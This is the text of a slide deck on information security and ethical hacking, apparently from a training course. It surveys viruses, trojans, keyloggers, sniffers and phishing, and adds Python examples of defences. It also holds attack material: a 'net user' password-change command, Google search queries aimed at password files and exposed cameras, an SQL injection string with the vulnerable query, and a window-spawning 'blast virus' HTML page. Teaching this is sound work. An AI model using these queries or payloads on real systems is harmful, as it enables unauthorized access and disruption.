Information security & ethical hacking
Uploaded by: eiti-panchkula
Category: Education
INFORMATION SECURITY & ETHICAL HACKING
How secure are you……?
Agenda
• Network’s Exposure to Security Threats
• What is Information Security And Ethical Hacking
• Two Major Aspects - Desktop & Internet Security
• Live Demonstrations of Attacks
“By the end of 2013, 95% of enterprises will be infected with undetected, financially motivated, targeted threats that evaded their traditional perimeter and host defenses” - By Gartner, Top Ten Key Predictions, 2012
security predictions in 2012
Network’s Exposures To Threats
Two Major Aspects Of Security
Desktop and internet security
Cracking Login Password
SAM = Security Account Manager
• The passwords are stored in the SAM file
Cracking Tools:
• ERD Commander
• PH Crack
and many more…
That’s easy… but admin rights… hm…
OR we can Change the Password…
C:\> net user username password
You need admin rights!
But you can change the passwords of other admin users!
The three major threats to the computer world…!!
Virus & Worms
Keylogger
Trojan Horse
Today almost 87% of all viruses/worms are spread through the Internet.
Symptoms
• The system might start hanging.
• Software and applications often start crashing.
• System may become unpredictable.
• In some extreme cases OS may also crash.
AND
• Worms… These generally don’t perform any malicious activity.
• They reside in the system and make copies of themselves.
• These eat up the system resources.
Let's Code a Virus!! Is it difficult?
Trojan Horse
Trojan… is a fatal gift !
A Trojan is an infection that steals information.
It then sends the information to a specified location over the internet.
It makes the computer prone to hackers by making Backdoors.
Attacker Victim
KEYLOGGER
They log all the keys that you type.
This runs in the background and is totally invisible.
Trojans often carry keyloggers with them, and they mail the log to their masters.
Watch your key strokes…!
Windows Registry
Know how changes in the registry affect your system……!
All initialization and configuration information used by Windows is stored in the registry.
Network Scanners
Network scanners are used to find all the live systems present in the network, along with information such as IP address, port numbers, services running on those ports, vulnerabilities, installed applications, etc.
Some Tools:
• Angry IP Scanner
• GFI LANguard
• Look@LAN
Finding live Hosts…!
Sniffers
Sniffers are used to capture data packets from the network by applying some poisoning technique, such as ARP poisoning.
Some Tools:
• Cain and Abel
• Ettercap
hmmmmmmmmmm…!
Cryptography
The art of secret writing: converting plaintext (readable format) into ciphertext (non-readable format) by using some algorithm with the help of a key.
Encrypters…!
Steganography
The art of secret writing to hide one file behind another file. For example, a text message can be hidden behind an image or video file.
Hiding……..
• Use antivirus software with updated signatures
• Use firewalls
• Do not open untrusted executables
• Use cryptography techniques
How Do I Protect My Data ?
I will mess it up…!
World Wide Web…
Let's move to the Internet…
Web Developer’s Nightmare
Website Exploits…
Google Hacking
SQL Injection
DoS Attack
DNS Spoofing
Remote System Scanning
Google Cracking
Using Google
Google is more than just a search engine. Special keywords can perform better searches.
Google crawls the web…!
Google Commands: site, intitle, filetype, allintitle, inurl
Database Cracking
Hmmmmmmmmmmm…..
Filetype:xls hry.nic.in
Advanced Googling
Intitle:index .of master.passwd
Password Cracking
Camera Cracking
Inurl:indexframe.shtml axis
SQL attack…
Let's see how this is done…!
Let's see how a simple SQL injection works…
' OR '1'='1
Backend SQL string:
Select * from table where user='" & TextBox1.Text & "' AND pass='" & TextBox2.Text & "';
String after SQL injection:
Select * from table where user='' OR '1'='1' AND pass='' OR '1'='1';
We know that user='' OR '1'='1' AND pass='' OR '1'='1' is always true…!
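The same login check in Python with sqlite3, as an added example that is not part of the original slides: the concatenated query from the slide beside a parameterized one. The table layout and the account `alice` are constructed for the demonstration.

```python
import sqlite3

def make_db():
    """In-memory table with one constructed account.
    Plaintext password only to mirror the slide; real systems store salted hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_concat(db, user, password):
    """Vulnerable: builds the query by string concatenation, as the slide's backend does."""
    sql = ("SELECT * FROM users WHERE user='" + user +
           "' AND pass='" + password + "';")
    return db.execute(sql).fetchall(), sql

def login_param(db, user, password):
    """Hardened: placeholders keep the input as data, never as SQL syntax."""
    sql = "SELECT * FROM users WHERE user=? AND pass=?"
    return db.execute(sql, (user, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    typed = "' OR '1'='1"  # the input shown on the slide
    rows, sql = login_concat(db, typed, typed)
    print("query sent to the database:", sql)
    print("rows matched, concatenated:", len(rows))
    print("rows matched, parameterized:", len(login_param(db, typed, typed)))
    print("real login, parameterized:", len(login_param(db, "alice", "s3cret")))
```

With placeholders the quote characters are compared as part of the user name, so the WHERE clause keeps its original shape and no row matches.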
Uptu vice chancellor desk….
Jetking Super Admin Section…..
Phishing
Fake Emails
Dangers for Internet Users…
Surfing Online…
Social Networking
Abuse
Browser Hacking
Browser Cracking
Let's Do It.........
• Use script links that run in the browser.
• These scripts change the behavior of the browser.
• Example:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin (R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)
javascript:b=[]; a=document.images; for(wt=0; wt<a.length; wt++){a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0; setInterval('j++; for(wt=0; wt<b.length; wt++){b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1); void(0);
Blast Virus
Let's Do It.........
<html>
<body>
<script language="javascript">
while(1)
{
w1=window.open();
w1.document.write("<center><font color=red size=5> blaaaast!!</font></center>");
}
</script>
</body>
</html>
Let's Send a Fake Email!
Fake Emails
Sending fake mails with fake headers
E-mails can be sent to anyone from any ID
It is also used in spamming
It's [email protected] ...
How to Catch Fake Emailers
Analyze the headers
Use sites like “whatismyipaddress.com” to trace the IP address of the fake mail
Go to “Regional Internet Registries” like APNIC, AFRINIC, etc.
Get the email of the attacker's ISP & lodge the complaint.
Catch me if u can…
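The header-analysis step as an added Python example, not part of the original slides: it walks the `Received` headers from newest to oldest and returns the first external IP recorded by a mail server you operate, because any header written below that point is supplied by the sender and can be forged. The message, host names, addresses and the trusted-server list are constructed assumptions.

```python
import email
import ipaddress
import re

# Constructed sample; all hosts and addresses below are made up for illustration.
SAMPLE = """\
Received: from mx1.example.net (mx1.example.net [10.0.0.5])
    by mailstore.example.net with ESMTP id A1; Mon, 1 Jan 2024 10:00:03 +0000
Received: from mail.sender.test (unknown [203.0.113.45])
    by mx1.example.net with ESMTP id B2; Mon, 1 Jan 2024 10:00:01 +0000
Received: from bank.example (localhost [198.51.100.7])
    by mail.sender.test with SMTP id C3; Mon, 1 Jan 2024 09:59:59 +0000
From: "Support" <support@bank.example>
Subject: Account problem

Please verify your account.
"""

# Assumption: the servers we run ourselves, whose Received lines we can trust.
TRUSTED_RECEIVERS = {"mailstore.example.net", "mx1.example.net"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# "from <name> (... [<ipv4>]) by <host>"; IPv6 peers are ignored here.
HOP = re.compile(r"from\s+(\S+).*?\[(\d{1,3}(?:\.\d{1,3}){3})\].*?\bby\s+(\S+)", re.S)

def parse_hops(raw):
    """Return (claimed_name, peer_ip, receiving_host) per Received header, newest first."""
    hops = []
    for value in email.message_from_string(raw).get_all("Received", []):
        m = HOP.search(value)
        if m:
            try:
                hops.append((m.group(1), ipaddress.ip_address(m.group(2)), m.group(3)))
            except ValueError:
                continue  # e.g. 999.1.1.1: skip a malformed address
    return hops

def handoff_ip(raw):
    """First external IP recorded by a trusted server, or None."""
    for _name, ip, by in parse_hops(raw):
        if by not in TRUSTED_RECEIVERS:
            break  # this header and everything below it can be forged by the sender
        if not any(ip in net for net in INTERNAL_NETS):
            return str(ip)
    return None

if __name__ == "__main__":
    print(handoff_ip(SAMPLE))
```

The returned address is the one to look up at the Regional Internet Registry; the lowest header in the sample claims a different origin but was written by the sending side.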
Password?
E-mail: “There’s a problem with your Gmail account”
User thinks it’s Gmail.com
(But it's Gmail.org)
Password sent
Phishing Attack
Let's make a fake page…
Preventing Phishing
Read the URL carefully…
Keep a suspicious eye on e-mails that demand information.
Anti-phishing Tools can be effective…
Use your Brain…
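"Read the URL carefully" as a mechanical check, in an added Python example that is not part of the original slides: it compares the host a link really points to against the domain the user expects, covering the Gmail.org case above plus a few common disguises. The function name and the sample links are constructed.

```python
from urllib.parse import urlsplit

def check_link(url, expected_domain):
    """Return 'ok' or the reason the link does not belong to expected_domain."""
    parts = urlsplit(url)
    # hostname is already lower-cased; a trailing dot is the same host
    host = (parts.hostname or "").rstrip(".")
    if parts.scheme != "https":
        return "not https"
    if parts.username is not None:
        # https://gmail.com@other.host/ goes to other.host, not gmail.com
        return "userinfo before @ hides the real host: " + host
    if any(label.startswith("xn--") for label in host.split(".")):
        return "punycode label (possible look-alike characters): " + host
    # Exact match or a true subdomain; "mygmail.com" must not pass
    if host == expected_domain or host.endswith("." + expected_domain):
        return "ok"
    return "host is " + host + ", not " + expected_domain

if __name__ == "__main__":
    # Constructed links for illustration
    for link in ("https://accounts.gmail.com/login",
                 "https://gmail.org/login",
                 "https://gmail.com.login.example/",
                 "https://gmail.com@203.0.113.9/",
                 "https://mygmail.com/",
                 "http://gmail.com/"):
        print(link, "->", check_link(link, "gmail.com"))
```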
This is just a trailer; the movie is about to begin…
Thank You
For any query and assistance,
Kindly contact:
Appin Technology lab